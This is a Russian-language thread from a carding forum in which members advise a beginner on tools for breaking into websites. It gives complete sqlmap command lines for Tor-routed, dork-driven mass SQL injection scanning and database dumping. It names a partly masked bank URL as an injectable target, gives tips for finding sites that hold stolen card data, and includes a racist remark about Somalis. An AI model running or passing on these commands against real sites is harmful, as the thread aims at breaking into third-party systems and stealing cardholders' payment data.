1. По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
    Скрыть объявление
Скрыть объявление
По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
Скрыть объявление
Проводите сделки через Гарант-сервис чтоб полностью обезопасить свои покупки.

Софт для поиска уязвимости.

Тема в разделе "Кардинг для новичков. Вопросы и ответы.", создана пользователем Yahoo, 29 май 2014.

  1. Yahoo

    Yahoo

    Сообщения:
    10
    Симпатии:
    0
    Баллы:
    1
    Здравствуйте хорумчане.
    Вопрос по софту. Интресует платный или бесплатный софт для поиска уязвимости сайтов.
    Также готов пройти обучение да бы узнать что-то новенькое.
    Спасибо.
  2. zveroboy891

    zveroboy891

    Сообщения:
    189
    Симпатии:
    2
    Баллы:
    18
    SQL качаешь Sqlmap воодишь sqlmap -g "Дорка" --smart --gpage 10 --batch --dbms=mysql --risk=3 --level=5 --time-sec=15 --tor --tor-type=SOCKS5 --random-agen --threads=10
    Для чего служат команды можно найти в палике, расписывать не буду
    сама иньекция sqlmap -u УРЛ Уязвимости --dbs --dbms=mysql --risk=3 --level=5 --identify-waf --check-waf --time-sec=15 --tor --tor-type=SOCKS5 --random-agen --threads=10

    XSS-Xenotix XSS Exploit Framework


    Выше упомянутые программы как вы заметили работают по двум уязвимостям.Для общего пентеста посоветую OWASP ZAP и ясное дело Burp_Suite_Pro, который на мой взгляд является лучшим). По обеим программам есть мого обучаешего видео на ютубе.

    А если обобщить - качайте Kali Linux ставьте на вм и Офигивайте от кол-ва интересующих вас программ)
  3. NewCard

    NewCard

    Сообщения:
    263
    Симпатии:
    0
    Баллы:
    16
    Я руками все привык делать, если ты думаешь что существует только SQL уязвимость, то ты глубоко ошибаешься.
    школота все сайты наверное уже взломала со своим хавижом, если хозяин магазина себя уважает, то вряд ли там будет такая глупая дырка
  4. zveroboy891

    zveroboy891

    Сообщения:
    189
    Симпатии:
    2
    Баллы:
    18
    Значит тут он себя не уважает) http://www.salaamsom...pages.php?id=1'
    А вроде банк должен уважать)
  5. NewCard

    NewCard

    Сообщения:
    263
    Симпатии:
    0
    Баллы:
    16
    Сомалийский банк, они тупее моего кота наверное
  6. zveroboy891

    zveroboy891

    Сообщения:
    189
    Симпатии:
    2
    Баллы:
    18
    А так в принципи если льется хави,то зачем придумывать велосипед, главное выбирать другую нишу сайто а ни шоп, чтобы дорки и тд были так сказать приват) Ну а самое главное , искать всётаки нужно ручками...Тут подилюсь может кто ни знает, если вам пошасливолось найти картон в любом виде на сайте, по этой дорке 70% сайтов будут с картоном, тогда уже вбивает дорку в гугл и до посинения начинаем искать.....
    пс Сомалийский банк, они тупее моего кота наверное Ну ты прям Расист :blink:/>
  7. NewCard

    NewCard

    Сообщения:
    263
    Симпатии:
    0
    Баллы:
    16
    На счет расиста, есть такой грешок. Думают не головой, а что между ногами болтается
    Много разных уязвимостей нужно знать - это преимущество, школота хоть на сайте не гавнила
  8. zveroboy891

    zveroboy891

    Сообщения:
    189
    Симпатии:
    2
    Баллы:
    18
    Ладно думаю флуда достаточно наделали :)/> Но думаю что до ТС донесли что он хотел)
    ПС ты меня прям заинтриговал со своими Разными уязвимостями, если не затруднит кинь в пм. названия Охота поиграться
  9. Yahoo

    Yahoo

    Сообщения:
    10
    Симпатии:
    0
    Баллы:
    1
    Спасибо!!! Многие ответы улыбнули))) Буду учится!
    PS: Прошу дополнить если еще что-то ребята упустили.! :)/>
  10. Yahoo

    Yahoo

    Сообщения:
    10
    Симпатии:
    0
    Баллы:
    1
    Присоеденяюсь.
  11. baqa4u

    baqa4u

    Сообщения:
    1
    Симпатии:
    0
    Баллы:
    1
    Jsky иши гугла

Поделиться этой страницей